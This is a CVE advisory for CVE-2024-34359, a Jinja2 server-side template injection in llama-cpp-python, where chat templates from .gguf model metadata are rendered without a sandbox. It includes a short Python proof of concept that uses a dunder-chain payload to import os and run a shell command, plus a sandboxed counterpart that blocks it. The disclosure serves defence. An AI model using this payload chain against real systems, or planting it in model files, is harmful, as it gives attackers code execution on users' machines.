llama-cpp-python provides Python bindings for llama.cpp. It relies on the `Llama` class in `llama.py` to load llama.cpp-compatible models in `.gguf` format. The `Llama.__init__` constructor takes several parameters that configure how the model is loaded and run. Besides NUMA, LoRA settings, tokenizer loading, and hardware settings, `__init__` also reads the chat template from the targeted `.gguf` file's metadata and passes it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct `self.chat_handler` for the model. However, `Jinja2ChatFormatter` parses the chat template from the metadata with a sandbox-less `jinja2.Environment`, which is then rendered in `__call__` to construct the prompt for each interaction. Because the template ships inside the model file and is rendered without a sandbox, this allows Jinja2 Server Side Template Injection (SSTI), which a carefully constructed payload can escalate to remote code execution.
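The following is a minimal, self-contained sketch of the issue, not code from llama-cpp-python itself: the template string stands in for an attacker-controlled chat template embedded in a `.gguf` file's metadata, and the payload uses a well-known Jinja2 escape chain to reach `__builtins__` and import `os` (the command is a harmless `echo` here).

```python
import jinja2
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# Stand-in for an attacker-controlled chat template from model metadata:
# walks from the template-local `self` object to __builtins__, imports os,
# and runs a shell command.
malicious_template = (
    "{{ self.__init__.__globals__.__builtins__"
    ".__import__('os').popen('echo pwned').read() }}"
)

# Sandbox-less rendering, as in the vulnerable code path: the dunder
# attribute chain is permitted and the shell command executes.
unsafe_env = jinja2.Environment()
print(unsafe_env.from_string(malicious_template).render())  # prints "pwned"

# Sandboxed rendering: unsafe attribute access is rejected and a
# SecurityError is raised instead of executing anything.
safe_env = ImmutableSandboxedEnvironment()
try:
    safe_env.from_string(malicious_template).render()
except SecurityError as exc:
    print("blocked:", exc)
```

Note that simply loading and chatting with a malicious model is enough to trigger the bug: the template is rendered when the chat handler formats a conversation, so no special input from the victim is required. Switching to a sandboxed environment, as in the second half of the sketch, is the approach the upstream fix took (llama-cpp-python 0.2.72).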
History
No history.
MITRE
Status: PUBLISHED
Assigner: GitHub_M
Published: 2024-05-10T17:07:18.850Z
Updated: 2024-08-02T02:51:10.739Z
Reserved: 2024-05-02T06:36:32.439Z
Link: CVE-2024-34359
Vulnrichment
Updated: 2024-08-02T02:51:10.739Z
NVD
Status: Awaiting Analysis
Published: 2024-05-14T15:38:45.093
Modified: 2024-05-14T16:12:23.490
Link: CVE-2024-34359
Redhat
No data.